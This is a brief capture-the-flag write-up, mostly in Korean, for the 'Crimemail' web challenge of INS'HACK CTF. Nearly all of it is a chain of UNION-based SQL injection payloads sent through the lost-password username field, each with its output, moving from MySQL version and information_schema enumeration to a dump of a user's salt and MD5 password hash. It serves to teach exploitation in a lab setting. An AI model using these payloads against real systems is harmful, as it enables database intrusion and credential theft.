INS'HACK CTF Write up

Crimemail (web)

Lost Password 부분에서 SQL Injection 취약점 발생함. 

username=aa' UNION ALL SELECT CONCAT(0x71706a7071,0x44635a76516b464e54626c766b6b56796843685a5650546c52427a6b6a69626a4c576b65776f5041,0x7171717071)#

username=aa' UNION ALL SELECT 1#

 -> 1

aa' UNION ALL SELECT @@version#

 -> 5.7.21-0ubuntu0.16.04.1

aa' union all select info from information_schema.processlist#

 -> SELECT hint FROM users WHERE username='aa' union all select info from information_schema.processlist#'

aa' union all select database()#

 -> db

aa' union all select concat(table_name,"\n") from information_schema.tables where table_schema=database()#

 -> users

aa' union all select column_name from information_schema.columns where table_name='users'#

 -> userID, username, pass_salt, pass_md5, hint

aa' union all select concat(userID, "|", username, "|", pass_salt, "|", pass_md5, "|", hint) as a from users#

 -> 5|c.hackle|yhbG|f2b31b3a7a7c41093321d0c98c37f5ad|I don't need any hints man!

md5 로 찾으면 댄다.